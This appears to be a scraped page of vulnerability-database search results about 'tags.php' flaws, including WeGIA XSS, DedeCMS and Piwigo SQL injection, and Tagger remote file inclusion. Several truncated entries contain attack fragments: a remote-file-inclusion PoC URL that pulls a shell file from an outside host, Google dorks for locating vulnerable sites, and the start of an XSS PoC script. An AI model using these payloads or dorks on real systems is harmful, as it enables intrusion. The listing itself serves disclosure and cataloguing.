CVE-2025-23034

WeGIA is an open source web manager with a focus on the Portuguese language and charitable institutions. A Reflected Cross-Site Scripting XSS vulnerability was identified in the tags.php endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts in the msge...

CVE-2025-23034 Cross-Site Scripting (XSS) Reflected endpoint 'tags.php' parameter 'msg_e' in WeGIA

WeGIA is an open source web manager with a focus on the Portuguese language and charitable institutions. A Reflected Cross-Site Scripting XSS vulnerability was identified in the tags.php endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts in the msge...

CVE-2025-23034

CVE-2025-23034 describes a reflected XSS in WeGIA’s tags.php endpoint, where the msg_e parameter is not validated or sanitized, allowing malicious scripts to be echoed back and executed in the victim’s browser. The vulnerability affects WeGIA versions prior to 3.2.6 and is addressed by upgrading ...

CVE-2025-23034 Cross-Site Scripting (XSS) Reflected endpoint 'tags.php' parameter 'msg_e' in WeGIA

WeGIA is an open source web manager with a focus on the Portuguese language and charitable institutions. A Reflected Cross-Site Scripting XSS vulnerability was identified in the tags.php endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts in the msge...

CVE-2023-4747 DedeCMS tags.php sql injection

A vulnerability classified as critical was found in DedeCMS 5.7.110. This vulnerability affects unknown code of the file /uploads/tags.php. The manipulation of the argument tagalias leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may ...

Cross-Site Scripting (XSS)

thorsten/phpmyfaq is vulnerable to Cross-Site Scripting XSS. The vulnerability exists in getAllLinkTagsById of Tags.php due to missing conversion of the tag field to html entities which allows an attacker to inject and execute arbitrary javascript...

yuanye.cm XSS vulnerability

Open Bug Bounty ID: OBB-607521 Description| Value ---|--- Affected Website:| yuanye.cm Open Bug Bounty Program:| Create your bounty program now. It's open and free. Vulnerable Application:| Custom Code Vulnerability Type:| XSS Cross Site Scripting / CWE-79 CVSSv3 Score:| 6.1...

Sql injection

Piwigo before 2.9.3 has SQL injection in admin/tags.php in the administration panel, via the tags array parameter in an admin.php?page=tags request. The attacker must be an administrator...

DIY-CMS blog mod SQL Injection Vulnerability

No description provided by source. Exploit Title: DIY-CMS blog mod SQL Injection Author: snup Contact: [email protected] Site: http://e-o-u.org SQL Injection: DORK: inurl:mod.php?mod=blog intext:powered by DIY-CMS inurl:mod.php?mod=blog BUG:...

WordPress < 3.3.3 / 3.4.0 Multiple Vulnerabilities

According to its version number, the WordPress install hosted on the remote web server is affected by the following vulnerabilities : - A cross-site scripting flaw exists in the 'edit-tags.php' script where it does not validate the 'slug' parameter upon submission. This could allow a remote...

MyBB 1.6.5 suffers from a cross site scripting vulnerability

No description provided by source. !/usr/bin/env python coding: utf-8 from pocsuite.net import req from pocsuite.poc import POCBase, Output from pocsuite.utils import register import requests ''' 原始利用链接： /tags.php?tag="prompt/SEBUG@TEST/ ''' class TestPOCPOCBase: vulID = '26119' ssvid version =...

WordPress 3.1.3,3.1.4,3.2-RC1,3.2-RC3 edit-tags.php SQL注入

No description provided by source...

Unfixed XSS vulnerability at lookr.tv

Security researcher cbr, has submitted on 25/07/2010 a cross-site-scripting XSS vulnerability affecting lookr.tv, which at the time of submission ranked 640118 on the web according to Alexa. We manually validated and published a mirror of this vulnerability on 13/12/2011. It is currently unfixed...

CVE-2008-6567

Multiple cross-site scripting XSS vulnerabilities in Gallarific Free Edition allow remote attackers to inject arbitrary web script or HTML via 1 the e-mail address, 2 a comment, which is not properly handled during moderation, and 3 the tag parameter to gallery/tags.php...

gallarific-xss.txt

Hello, I was looking at the free version of gallarific, and I found some suspicious code in the scopbin directory. Attached is a file I found in the zip i downloaded, in case someone wants to decode it. the package can be downloaded from http://www.gallarific.com/download.php Also, the software...

Tagger Luxury Edition (BBCodeFile) Remote File Include Vulnerability

No description provided by source. Tagger v3 = BBCodeFile Remote file inclusion Discovered by : Morgan Error in : tags.php include$BBCodeFile; Vendor Website: http://www.venturenine.com PoC: http://victim-site.com/tags.php?BBCodeFile=http://ehmorgan.net/shell.dat? Google dork: intitle:"Tagger LE"...

Tagger v3 &lt;= BBCodeFile Remote file inclusion

Tagger v3 = BBCodeFile Remote file inclusion Discovered by : Morgan Error in : tags.php include$BBCodeFile; Vendor Website: http://www.venturenine.com PoC: http://victim-site.com/tags.php?BBCodeFile=http://ehmorgan.net/shell.dat? Google dork: intitle:"Tagger LE" inurl:tags.php Visit us :...

Tagger Luxury Edition (BBCodeFile) Remote File Include Vulnerability

Exploit for unknown platform in category web applications ==================================================================== Tagger Luxury Edition BBCodeFile Remote File Include Vulnerability ==================================================================== Tagger v3 = BBCodeFile Remote file...

Tagger Luxury Edition - &#039;BBCodeFile&#039; Remote File Inclusion

Tagger v3 = BBCodeFile Remote file inclusion Discovered by : Morgan Error in : tags.php include$BBCodeFile; Vendor Website: http://www.venturenine.com PoC: http://victim-site.com/tags.php?BBCodeFile=http://ehmorgan.net/shell.dat? Google dork: intitle:"Tagger LE" inurl:tags.php Visit us :...